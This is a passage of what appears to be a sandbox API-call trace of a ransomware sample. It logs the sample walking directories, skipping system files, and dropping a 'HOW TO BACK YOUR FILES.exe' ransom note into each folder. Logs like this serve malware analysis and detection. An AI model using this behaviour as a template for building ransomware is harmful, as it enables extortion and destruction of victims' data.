dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xbf140, lpName=0x0) returned 0x154 [0072.549] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbf140) returned 0x3450000 [0072.610] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0072.611] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0072.611] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0072.611] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0072.611] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0072.611] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0072.611] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0072.611] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0072.611] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0072.611] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0072.611] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0072.611] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0072.611] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0072.611] UnmapViewOfFile (lpBaseAddress=0x3450000) returned 1 [0072.618] CloseHandle (hObject=0x154) returned 1 [0072.618] CloseHandle (hObject=0x12c) returned 1 [0072.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0072.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0072.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0072.622] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa912d270, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0x968d5df0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0xbee38, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VC_redist.x64.exe", cAlternateFileName="VC_RED~1.EXE")) returned 0 [0072.622] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0072.622] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2628 [0072.622] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017") returned="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017" [0072.622] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2df0 | out: hHeap=0x2b0000) returned 1 [0072.622] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2620 | out: hHeap=0x2b0000) returned 1 [0072.622] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017") returned 83 [0072.622] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017") returned="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017" [0072.622] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0072.622] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\how to back your files.exe"), bFailIfExists=1) returned 0 [0072.623] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0072.623] GetLastError () returned 0x0 [0072.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0072.623] ReadFile (in: hFile=0x164, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0072.623] CloseHandle (hObject=0x164) returned 1 [0072.624] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0072.624] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0072.624] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa93425b0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4bc63fa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bc63fa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0072.624] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0072.624] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0072.624] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0072.624] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa93425b0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4bc63fa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bc63fa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.624] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0072.624] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0072.624] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0072.624] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0072.624] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bc63fa0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4bc63fa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0072.624] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0072.624] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4bc8a100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bc8a100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0072.624] lstrcmpiW (lpString1="packages", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0072.624] lstrcmpiW (lpString1="packages", lpString2="aoldtz.exe") returned 1 [0072.624] lstrcmpiW (lpString1="packages", lpString2=".") returned 1 [0072.624] lstrcmpiW (lpString1="packages", lpString2="..") returned 1 [0072.624] lstrcmpiW (lpString1="packages", lpString2="windows") returned -1 [0072.624] lstrcmpiW (lpString1="packages", lpString2="bootmgr") returned 1 [0072.624] lstrcmpiW (lpString1="packages", lpString2="temp") returned -1 [0072.624] lstrcmpiW (lpString1="packages", lpString2="pagefile.sys") returned -1 [0072.624] lstrcmpiW (lpString1="packages", lpString2="boot") returned 1 [0072.624] lstrcmpiW (lpString1="packages", lpString2="ids.txt") returned 1 [0072.624] lstrcmpiW (lpString1="packages", lpString2="ntuser.dat") returned 1 [0072.624] lstrcmpiW (lpString1="packages", lpString2="perflogs") returned -1 [0072.624] lstrcmpiW (lpString1="packages", lpString2="MSBuild") returned 1 [0072.624] lstrlenW (lpString="packages") returned 8 [0072.624] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*") returned 85 [0072.625] lstrcpyW (in: lpString1=0x2cce4a8, lpString2="packages" | out: lpString1="packages") returned="packages" [0072.625] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2620 [0072.625] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xba) returned 0x318fc8 [0072.625] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2628 | out: ListHead=0x2e7710, ListEntry=0x2d2628) returned 0x2d25a8 [0072.625] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4bc8a100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bc8a100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0072.625] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0072.625] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2628 [0072.625] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages") returned="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages" [0072.625] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x318fc8 | out: hHeap=0x2b0000) returned 1 [0072.625] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2620 | out: hHeap=0x2b0000) returned 1 [0072.625] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages") returned 92 [0072.625] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages") returned="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages" [0072.625] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0072.625] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0072.625] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0072.626] GetLastError () returned 0x0 [0072.626] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0072.626] ReadFile (in: hFile=0x164, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0072.626] CloseHandle (hObject=0x164) returned 1 [0072.626] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0072.626] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0072.626] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4bc8a100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bc8a100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0072.626] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0072.626] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0072.626] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0072.626] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4bc8a100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bc8a100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.626] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0072.626] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0072.626] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0072.626] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0072.626] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bc8a100, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4bc8a100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0072.626] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0072.626] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4bc8a100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bc8a100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcRuntimeAdditional_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0072.626] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0072.626] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="aoldtz.exe") returned 1 [0072.626] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2=".") returned 1 [0072.626] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="..") returned 1 [0072.626] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="windows") returned -1 [0072.626] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="bootmgr") returned 1 [0072.626] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="temp") returned 1 [0072.627] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="pagefile.sys") returned 1 [0072.627] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="boot") returned 1 [0072.627] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="ids.txt") returned 1 [0072.627] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="ntuser.dat") returned 1 [0072.627] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="perflogs") returned 1 [0072.627] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="MSBuild") returned 1 [0072.627] lstrlenW (lpString="vcRuntimeAdditional_amd64") returned 25 [0072.627] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*") returned 94 [0072.627] lstrcpyW (in: lpString1=0x2cce4ba, lpString2="vcRuntimeAdditional_amd64" | out: lpString1="vcRuntimeAdditional_amd64") returned="vcRuntimeAdditional_amd64" [0072.627] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2620 [0072.627] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xee) returned 0x2c8eb8 [0072.627] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2628 | out: ListHead=0x2e7710, ListEntry=0x2d2628) returned 0x2d25a8 [0072.627] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4bc8a100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bc8a100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcRuntimeAdditional_amd64", cAlternateFileName="VCRUNT~1")) returned 0 [0072.627] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0072.627] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2628 [0072.627] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64") returned="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64" [0072.627] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0072.627] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2620 | out: hHeap=0x2b0000) returned 1 [0072.627] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64") returned 118 [0072.627] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64") returned="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64" [0072.627] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0072.627] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\how to back your files.exe"), bFailIfExists=1) returned 0 [0072.628] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0072.628] GetLastError () returned 0x0 [0072.628] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0072.628] ReadFile (in: hFile=0x164, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0072.628] CloseHandle (hObject=0x164) returned 1 [0072.628] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0072.628] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0072.628] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4bc8a100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bc8a100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0072.628] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0072.628] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0072.628] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0072.628] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4bc8a100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bc8a100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.628] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0072.628] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0072.628] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0072.628] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0072.629] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdae7f300, ftCreationTime.dwHighDateTime=0x1d28824, ftLastAccessTime.dwLowDateTime=0xdae7f300, ftLastAccessTime.dwHighDateTime=0x1d28824, ftLastWriteTime.dwLowDateTime=0xdae7f300, ftLastWriteTime.dwHighDateTime=0x1d28824, nFileSizeHigh=0x0, nFileSizeLow=0x59bde5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0072.629] lstrcmpiW (lpString1="cab1.cab", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0072.629] lstrcmpiW (lpString1="cab1.cab", lpString2="aoldtz.exe") returned 1 [0072.629] lstrcmpiW (lpString1="cab1.cab", lpString2=".") returned 1 [0072.629] lstrcmpiW (lpString1="cab1.cab", lpString2="..") returned 1 [0072.629] lstrcmpiW (lpString1="cab1.cab", lpString2="windows") returned -1 [0072.629] lstrcmpiW (lpString1="cab1.cab", lpString2="bootmgr") returned 1 [0072.629] lstrcmpiW (lpString1="cab1.cab", lpString2="temp") returned -1 [0072.629] lstrcmpiW (lpString1="cab1.cab", lpString2="pagefile.sys") returned -1 [0072.629] lstrcmpiW (lpString1="cab1.cab", lpString2="boot") returned 1 [0072.629] lstrcmpiW (lpString1="cab1.cab", lpString2="ids.txt") returned -1 [0072.629] lstrcmpiW (lpString1="cab1.cab", lpString2="ntuser.dat") returned -1 [0072.629] lstrcmpiW (lpString1="cab1.cab", lpString2="perflogs") returned -1 [0072.629] lstrcmpiW (lpString1="cab1.cab", lpString2="MSBuild") returned -1 [0072.629] lstrlenW (lpString="cab1.cab") returned 8 [0072.629] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*") returned 120 [0072.629] lstrcpyW (in: lpString1=0x2cce4ee, lpString2="cab1.cab" | out: lpString1="cab1.cab") returned="cab1.cab" [0072.629] lstrlenW (lpString="cab1.cab") returned 8 [0072.629] lstrlenW 